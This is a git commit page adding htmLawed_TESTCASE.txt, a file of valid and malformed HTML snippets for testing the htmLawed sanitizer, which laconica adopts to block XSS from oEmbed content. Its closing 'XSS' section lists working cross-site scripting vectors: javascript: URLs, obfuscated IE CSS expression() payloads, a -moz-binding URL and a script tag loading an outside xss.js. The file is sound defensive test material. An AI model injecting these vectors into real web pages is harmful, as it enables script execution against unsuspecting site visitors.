diff options
author | Craig Andrews <candrews@integralblue.com> | 2009-07-27 13:42:03 -0400 |
---|---|---|
committer | Craig Andrews <candrews@integralblue.com> | 2009-07-27 13:42:03 -0400 |
commit | ac75772150c3fe9411408ac44db04e774d095aa0 (patch) | |
tree | fcf7b18289a31e602a821a7ea22f82e4c3cd3a54 /extlib/htmLawed/htmLawed_TESTCASE.txt | |
parent | b9cf19a2ee4b483709f1e964860fcf9209c4ba05 (diff) |
Sanitize html returned by oEmbed providers to protect laconica from XSS attacks
Diffstat (limited to 'extlib/htmLawed/htmLawed_TESTCASE.txt')
-rw-r--r-- | extlib/htmLawed/htmLawed_TESTCASE.txt | 370 |
1 files changed, 370 insertions, 0 deletions
diff --git a/extlib/htmLawed/htmLawed_TESTCASE.txt b/extlib/htmLawed/htmLawed_TESTCASE.txt new file mode 100644 index 000000000..366465ce3 --- /dev/null +++ b/extlib/htmLawed/htmLawed_TESTCASE.txt @@ -0,0 +1,370 @@ +/* +htmLawed_TESTCASE.txt, 23 April 2009 +htmLawed 1.1.8.1, 16 July 2009 +Copyright Santosh Patnaik +GPL v3 license +A PHP Labware internal utility - http://www.bioinformatics.org/phplabware/internal_utilities/htmLawed +*/ + +This file has UTF-8-encoded text with both correct and incorrect/malformed HTML/XHTML code snippets to test htmLawed (test cases/samples). The entire text may also be used as a unit. + +************************************************ +when viewing this file in a web browser, set the +character encoding to Unicode/UTF-8 +************************************************ + +--------------------- start -------------------- + +<em>Try different $config and $spec values. Some text even when filtered in will not be displayed in a rendered web-page</em><br /> + +<h6>Attributes</h6> + +<strong>Xml:lang:</strong><a lang="en" xml:lang="en"></a>, <a lang="en"></a>, <a xml:lang="en"></a><br /> +<strong>Standard, predefined value, or empty attribute:</strong> <input type="text" disabled />, <input type="text" disabled="DISABLED" />, <input type="text" disabled="1" /><br /> +<strong>Required:</strong> <img />, <img alt="image" /><br /> +<strong>Quote & space variation:</strong> <a id=id1 name=xy>a</a>, <a id='id2' name="xy">a</a>, <a id=' id3 ' name = "n" >a</a><br /> +<strong>Invalid:</strong> <a id="id4" src="s">a</a><br /> +<strong>Duplicated:</strong> <a id="id5" id="id6">a</a><br /> +<strong>Deprecated:</strong> <a id="id7" target="self" name="n">a</a>, <hr noshade="noshade" /><br /> +<strong>Casing:</strong> <a HREF=""></a><br /> +<strong>Admin-restricted?:</strong> <a href="x" onclick="alert();"></a> + +<h6>Attribute values</h6> + +<strong>Duplicate ID value:</strong><a id="id8"></a>, <a id="my_id8"></a>, <a id="id8"></a><br /> +(try 'my_' for prefix)<br /> +<strong>Double-quotes in value:</strong><a title=ab"c"></a>, <a title="ab"c"></a>, <a title='ab"c'></a><br /> +(try filter for CSS expression)<br /> +<strong>CSS expression</strong>: <div style="prop:expression();"></div><div style="prop:expression()"></div><div style="prop: expression();"></div><div style="prop : expression()"></div><div style="prop:expression(js);"></div><div style="prop:expression(js;)"></div><div style="prop: expression('js');"></div><div style="prop : expr ession('js':)"></div><div style="prop:expression( 'js@ );"></div><br /> +<strong>Other:</strong> <input size="50" class="my" value="an input an input an input" />, <input size="5" class="your" value="an input" /><br /> +(try 'maxlen', 'maxval', etc., for 'input' in '$spec') + +<h6>Blockquotes</h6> + +<blockquote>abc</blockquote><br /> +<blockquote>abc<div>def</div></blockquote><br /> +<blockquote><div>abc</div>def</blockquote><br /> +<blockquote>abc<div>def</div>ghi</blockquote><br /> +abc<div>def</div>ghi<br /> +(try with blockquote parent) + +<h6>CDATA sections</h6> + +<strong>Special characters inside:</strong> <![CDATA[ ]]> ]]>, <![CDATA[ 3 < 4 > 3.5, & 4 > 4 ]]><br /> +<strong>Normal:</strong> <![CDATA[ check ]]>, <em>CDATA follows:<![CDATA[ check ]]></em><br /> +<strong>Malformed:</strong> <![cdata check ]]>, < ![CDATA check ]]>, <![CDATA check ]]>, < ![CDATA check ] ]><br /> +<strong>Invalid:</strong> <em <![CDATA[ check ]]>>CDATA in tag content</em>, <table><![CDATA[ check ]]><tr><td>text not allowed</td></tr></table> + +<h6>Complex-1: deprecated elements</h6> + +<center> +The PHP <s>software</s> script used for this <strike>web-page</strike> webpage is <font style="font-weight: bold " face=arial size='+3' color = "red ">htmLawedTest.php</font>, from <u style= 'color:green'>PHP Labware</u>. +</center> + +<h6>Complex-2: deprecated attributes</h6> + +<img src="s" alt="a" name="n" /><img src="s" alt="a" id="id9" name="n" /> +<br clear="left" /> +<hr noshade size="1" /> +<img name="id10" src="s" align="left" alt="image" hspace="10" vspace="10" width="10em" height="20" border="1" style="padding:5px;" /> +<table width="50em" align="center" bgcolor="red"> + <tr> + <td width="20%"> + <div align="center"> + <h3 align="right">Section</h3> + <p align="right">Para</p> + <ol type="a" start="e"><li value="x"><a name="x">First</a> <a name="x" id="id11">item</a></li></ol> + </div> + </td> + <td width="*"> + <ol type="1"><li>First item</li></ol> + </td> + </tr> + </table> +<br clear="all" /> + +<h6>Complex-3: embed, object, area</h6> + +<object width="425" height="350"><param name="movie" value="http://www.youtube.com/v/ls7gi1VwdIQ"></param><embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed></object><br /> + +<embed src="http://www.youtube.com/v/ls7gi1VwdIQ" type="application/x-shockwave-flash" width="425" height="350"></embed><br /> + +<object data="1.gif" type="image/gif" usemap="#map1"><map name="map1"> +<p>navigate the site: <a href="1" shape="REct" coOrds="0,0,118,28">1</a> | <a href="3" shape="circle" coords="184,200,60">3</a> | <a href="4" shape="poly" coords="276,0,276,28,100,200,50,50,276,0">4</a></p> +<area href="5" shape="Rect" coords="0,0,118,28"> +</map></object> + +<h6>Complex-4: nested and other tables</h6> + +<table border="1" bgcolor="red"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> <table border="1" bgcolor="green"> <tr> <td> Cell </td> <td colspan="2" rowspan="2"> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table> </td> </tr> <tr> <td> Cell </td> </tr> <tr> <td> Cell </td> <td> Cell </td> <td> Cell </td> </tr> </table><br /> +<strong>PCDATA wrong:</strong> <table>Well<caption>Hello</caption></table><br /> +<strong>Missing tr:</strong> <table><td>Well</td></table><br /> + +<h6>Complex-5: pseudo, disallowed or non-HTML tags</h6> + +(Try different 'keep_bad' values) +<*> Pseudotags <*> +<xml>Non-HTML tag xml</xml> +<p> +Disallowed tag p +</p> +<ul>Bad<li>OK</li></ul> + +<h6>Elements</h6> + +<strong>Unbalanced:</strong> <a href="h"><em>check</a></em><br /> +<strong>Non-XHTML:</strong> <div><center><dir></dir></center></div><br /> +<strong>Malformed:</strong> < a href=""></a>, <a href="" ></a>, <a href="" ></a>, <a href="" +></a>, <a href="">< /a>, < a href=""></a >, <img src="s" alt="a" />, <img src="s" alt="a"/ >, <imgsrc="s" alt="a" /><br /> +<strong>Invalid:</strong> <image src="s" alt="a" /><br /> +<strong>Empty:</strong> <img src="s" alt="a" />, <img src="s" alt="a"></img>, <img src="s" alt="a">text</img><br /> +<strong>Content invalid:</strong> <a href="h">1<a>2</a></a><br /> +<strong>Content invalid?:</strong> <form></form><br /> (try setting 'form' as parent) +<strong>Casing:</strong> <A href=""></a> + +<h6>Entities</h6> + +<strong>Special:</strong> & 3 < 2 & 5>4 and j >i >a & i<j>a<br /> +<strong>Padding:</strong> B B f f  <br /> +<strong>Malformed:</strong> & #x27;, &x27;, ' &TILDE;, &tilde<br /> +<strong>Invalid:</strong> , �, , �, , &bad;<br /> +<strong>Discouraged characters:</strong> , „, , <br /> +<strong>Context:</strong> '>', <?<br /> +<strong>Casing:</strong> ', ', &TILDE;, ˜ +<br /> +(also check named-to-numeric and hexdec-to-decimal, and vice versa, conversions) + +<h6>Format</h6> + +<strong>Valid but ill-formatted:</strong> text <!-- comment --> +text <!-- +A c o m m e n t --> +<script> + <![CDATA[ + code + ]]> +</script><!-- comment --><![CDATA[ cdata ]]> <a>text</b> text<pre id="none">p r e</pre> +<textarea>text</textarea> <textarea> + text text +</textarea> text text <br /><hr /> +text <img src="none" alt="none" /> t<em class="none">e<strong>x</strong>t</em> +text <img src="none" alt="none" /> <b>t<em> e <strong> x </strong> t</em></b> + <a href="a"> text <img src="none" alt="none" /> <b>t <em> e <strong> x </strong> t</em></b> + </a> +<span style="background-color: yellow;">text <img src="none" alt="none" /> <b> <em> t e <strong> x </strong> t</em></b></span> +<script>script</script> +<div> + <pre id="none">p <a>r</a> e <!-- comment --> </pre> + <pre> + pre + </pre> +</div> +<div><div><table border="1" style="background-color: red;"><tr><td>Cell</td><td colspan="2" rowspan="2"><table border="1" style="background-color: green;"><tr><td>Cell</td><td colspan="2" rowspan="2"></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></td></tr><tr><td>Cell</td></tr><tr><td>Cell</td><td>Cell</td><td>Cell</td></tr></table></div></div> +(try to compact or beautify) + +<h6>Forms</h6> + +(note nesting of 'form', missing required attributes, etc.)<br /> +<form> +<script type="text/javascript">s</script> +<fieldset><legend>p</legend>l <input name="personal_lastname" type="text" tabindex="1"></fieldset> +<input name="h" type="checkbox" value="h" tabindex="20"> h +<textarea name="t">t</textarea> +<form action="a" method="get"></form></form><br /> +<form action="b" method="get"><p><input type="text" value="i" /></form><br /> +<form>B:<input type="text" value="b" />C:<input type="text" value="c" /></form><br /> +(try each of these lines separately)<br /> +<form action="a">what<br /> +<form action="a">what +(try with container as div and as form)<br /> +<form>c <a>a</a> <b>b</b><input /><script>s</script> + +<h6>HTML comments (also CDATA)</h6> + +Special characters inside: <!-- <![CDATA check ]]> -->, <!-- 3 < 4 > 3.5, & 4 > 4 -->, <!-- che--ck -->, <!--[if !IE]> <--><a>c</a><!--> <![endif]--><br /> +Normal: <!-- check -->, <!--check -->, <em>comment:<!-- check --></em><!-- check -->, <table><!-- check --><tr><td>text not allowed</td></tr></table><br /> +Malformed: <![cdata check ]]>, < ![CDATA check ]]>, < ![CDATA check ] ]><br /> +Invalid: <em <!-- check -->>comment in tag content</em>, <!--check--> + +<h6>Ins-Del</h6> + +(depending on context, these elements can be of either block or inline type)<br /> +<p><ins datetime="d" cite="c"><div>block</div></ins></p><br /> +<p><del>d</del></p><br /> +<p><ins><del>d</del></ins></p><div><ins><p><del><div>d</div></del></p></ins></div><ins><div>d</div></ins> + +<h6>Lists</h6> + +<strong>Invalid character data</strong>: <ul><li>(item</li>)</ul><br /> +<strong>Definition list</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b</dt><dd>second</dd></dl><br /> +<strong>Definition list, close-tags omitted</strong>: <dl><dt>a</dt>bad<dd>first <em>one</em></dd><dt>b<dd>second</dl><br /> +<strong>Definition lists, nested</strong>: <dl> + <dt>T1</dt> + <dd>D1</dd> + <dt>T2</dt> + <dd>D2<dl><dt>t1</dt><dd>d1</dd><dt>t2</dt><dd>d2</dd></dl></dd> + <dt>T3</dt> + <dd>D3</dd> + <dt>T4</dt> + <dd>D4<dl><dt>t1</dt><dd>d1</dd></dl></dd> +</dl><br /> +<strong>Definition lists, nested, close-tags omitted</strong>: <dl> + <dt>T1 + <dd>D1</dd> + <dt>T2</dt> + <dd>D2<dl><dt>t1<dd>d1<dt>t2</dt><dd>d2</dd></dl></dd> + <dt>T3 + <dd>D3 + <dt>T4 + <dd>D4<dl><dt>t1<dd>d1</dl></dd> +</dl><br /> +<strong>Nested</strong>: <ul> + <li>l1</li> + <li>l2<ol><li>lo1</li><li>lo2</li></ol></li> + <li>l3</li> + <li>l4<ol><li>lo3</li><li>lo4<ol><li>lo5</li></ol></li></ol></li> +</ul><br /> +<strong>Nested, close-tags omitted</strong>: <ul> + <li>l1</li> + <li>l2<ol><li>lo1<li>lo2</ol> + <li>l3 + <li>l4<ol><li>lo3<li>lo4<ol><li>lo5</ol></ol> +</ul><br /> +<strong>Complex</strong>: +<ol><script></script><li><table><tr><td> +<ul><li id="search" class="widget widget_search"> <form id="searchform" method="get" action="http://kohei.us"> + <div> + + <input type="text" name="s" id="s" size="15" /><br /> + <input type="submit" value="Search" /> + </div> + </form> + </li></ul> +</td></tr></table></li></ol> + +<h6>Non-English text-1</h6> + +Inscrieţi-vă acum la a Zecea Conferinţă Internaţională<br /> +გთხოვთ ახლავე გაიაროთ რეგისტრაცია<br /> +večjezično računalništvo<br /> +<a title="הירשמו +כעת לכנס ">Зарегистрируйтесь сейчас +на Десятую Международную Конференцию по</a><br /> +(this file should have utf-8 encoding; some characters may not be displayed because of missing fonts, etc.) + +<h6>Non-English text-2: entities</h6> + +用统一码<br /> +გთხოვთ<br /> +Inscreva-se agora para a Décima Conferência Internacional Sobre O Unicode, realizada entre os dias 10 e 12 de março de 1997 em Mainz +na Alemanha. + +<h6>Ruby</h6> + +(need compatible browser)<br /> +<ruby xml:lang="ja"> + <rbc> + <rb>斎</rb> + <rb>藤</rb> + <rb>信</rb> + <rb>男</rb> + </rbc> + <rtc class="reading"> + <rt>さい</rt> + <rt>とう</rt> + <rt>のぶ</rt> + <rt>お</rt> + </rtc> + <rtc class="annotation"> + <rt rbspan="4" xml:lang="en">W3C Associate Chairman</rt> + </rtc> +</ruby><br /> +<ruby> + <rb>WWW</rb> + <rp>(</rp><rt>World Wide Web</rt><rp>)</rp> +</ruby><br /> +<ruby> + A + <rp>(</rp><rt>aaa</rt><rp>)</rp> +</ruby> + +<h6>Tables</h6> + +<strong>Omitted closing tags:</strong> <table> +<colgroup><col style="x" /><col style="y" /> +<thead> +<tr><th>h1c1<th>h1c2 +<tbody> +<tr><td>r1c1<td>r1c2 +<tr><td>r2c1<td>r2c2 +</table><br /> +<strong>Nested, omitted closing tags:</strong> <table> +<colgroup><col style="x" /><col style="y" /> +<thead> +<tr><th>h1c1<th>h1c2 +<tbody> +<tr><td>r1c1<td>r1c2<table> +<colgroup><col style="x" /><col style="y" /> +<thead> +<tr><th>h1c1<th>h1c2 +<tbody> +<tr><td>r1c1<td>r1c2 +<tr><td>r2c1<td>r2c2 +</table> +<tr><td>r2c1<td>r2c2 +</table><br /> + +<h6>URLs</h6> + +<strong>Relative and absolute:</strong> <a href="mailto:x"></a>, <a href="http://a.com/b/c/d.f"></a>, <a href="./../d.f"></a>, <a href="./d.f"></a>, <a href="d.f"></a>, <a href="#s"></a>, <a href="./../../d.f#s"></a><br /> +(try base URL value of 'http://a.com/b/')<br /> +<strong>CSS URLs:</strong> <div style="background-image: url('a.gif');"></div>, <div style="background-image: URL("a.gif");"></div>, <div style="background-image: url('http://a.com/a.gif');"></div>, <div style="background-image: url('./../a.gif');"></div>, <div style="background-image: url('js:xss')"></div><br /> +<strong>Anti-spam:</strong> (try regex for 'http://a.com', etc.) <a href="mailto:x@y.com"></a>, <a href="http://a.com/b@d.f"></a>, <a href="a.com/d.f" rel="nofollow"></a>, <a href="a.com/d.f" rel="1, 2"></a>, <a href="a.com/d.f"></a>, <a href="b.com/d.f"></a>, <a href="c.com/d.f"></a><br /> + +<h6>XSS</h6> + +'';!--"<xss>=&{()}<br /> +<img src="javascript%3Aalert('xss');" /><br /> +<img src="javascript:alert('xss');" /><br /> +<img src="java script:alert('xss');" /><br /> +<img +src=javascript:alert('XSS') /><br /> +<div style="javascript:alert('xss');"></div><br /> +<div style="background-image:url(javascript:alert('xss'));"></div><br /> +<div style="background-image:url("javascript:alert('xss')" );"></div><br /> +<!--[if gte IE 4]><script>alert('xss');</script><![endif]--><br /> +<script a=">" src="http://ha.ckers.org/xss.js"></script><br /> +<div style="background-image: url('js:xss')"></div><br /> +<a style=";-moz-binding:url(http://lukasz.pilorz.net/xss/xss.xml#xss)" href="http://example.com">test</a><br /> +<strong>Bad IE7:</strong> <a href="http://x&x=%22+style%3d%22background-image%3a+expression%28alert +%28%27xss%3f%29%29">x</a><br /> +<strong>Bad IE7:</strong> <a style=color:expr/*comment*/ession(alert(document.domain))>xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: %45xpression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background:/**/Expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: expr%45ssion(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/* */ression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: exp /* */ression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background: exp/ * * /ression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background:/* x */expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="xxx" style="background:/* */ */expression(alert('xss'));">xxx</a><br /> +<strong>Bad IE7:</strong> <a href="x" style="width: /****/**;;;;;;*/expression/**/(alert('xss'));">x</a><br /> +<strong>Bad IE7:</strong> <a href="x" style="padding:10px; background:/**/expression(alert('xss'));">x</a><br /> +<strong>Bad IE7:</strong> <a href="x" style="background: huh /* */ */expression(alert('xss'));">x</a><br /> +<strong>Bad IE7:</strong> <a href="x" style="background:/**/expression(alert('xss'));background:/**/expression(alert('xss'));">x</a><br /> +<strong>Bad IE7:</strong> exp/*<a style='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>x</a><br /> +<strong>Bad IE7:</strong> <a style="background:Expre\ssion(alert('xss'));">hi</a><br /> +<strong>Bad IE7:</strong> <a style="background:expre\ssion(alert('xss'));">hi</a><br /> +<strong>Bad IE7:</strong> <a style="color: \0065 \0078 \0070 \0072 \0065 \0073 \0073 \0069 \006f \006e \0028 \0061 \006c \0065 \0072 \0074 \0028 \0031 \0029 \0029">test</a><br /> +<strong>Bad IE7:</strong> <a style="xss:e\0078pression(window.x?0:(alert(/XSS/),window.x=1));">hi</a><br /> +<strong>Bad IE7:</strong> <a style="background:url('java +script:eval(document.all.mycode.expr)')">hi</a><br /> + +<h6>Other</h6> + +3 < 4 <br /> +3 > 4 <br /> + > 3 <br />
\ No newline at end of file |